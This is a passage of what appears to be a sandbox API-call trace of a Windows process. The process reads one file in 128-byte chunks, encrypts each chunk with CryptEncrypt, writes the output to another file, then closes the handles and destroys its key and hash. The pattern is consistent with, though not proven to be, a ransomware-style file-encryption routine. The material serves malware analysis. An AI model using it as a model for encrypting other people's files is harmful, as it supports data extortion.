pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.304] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.304] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.304] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.304] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.304] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.304] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.304] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.304] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.304] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.304] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.304] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.304] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.304] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.304] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.304] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.304] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.304] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.304] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.304] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.305] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.305] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.305] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.305] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.305] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.305] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.305] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.305] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.305] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.305] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.305] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.305] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.305] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.305] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.305] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.305] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.305] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.305] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.305] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.305] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.305] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.305] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.306] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.306] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.306] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.306] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.306] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.306] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.306] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.306] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.306] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.306] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.306] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.310] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.310] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.310] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.310] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.310] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.310] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.310] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.310] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.310] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.310] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.310] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.310] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.310] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.310] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.310] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.311] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.311] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.311] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.311] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.311] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.311] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.311] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.311] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.311] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.311] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.311] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.311] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.311] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.311] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.311] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.312] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.312] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.312] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.312] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.312] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.312] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.312] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.312] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.312] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.312] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.312] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.312] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.312] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.312] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.312] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.312] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.312] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x80) returned 1 [0153.312] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x80, lpOverlapped=0x0) returned 1 [0153.313] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x57, lpOverlapped=0x0) returned 1 [0153.313] CryptEncrypt (in: hKey=0x284d668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x57, dwBufLen=0x80 | out: pbData=0x326a544*, pdwDataLen=0x326a4d4*=0x60) returned 1 [0153.313] WriteFile (in: hFile=0x454, lpBuffer=0x326a544*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x326a4c8, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesWritten=0x326a4c8*=0x60, lpOverlapped=0x0) returned 1 [0153.313] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x0, lpOverlapped=0x0) returned 1 [0153.313] CloseHandle (hObject=0x45c) returned 1 [0153.313] CloseHandle (hObject=0x454) returned 1 [0153.314] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.314] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.314] 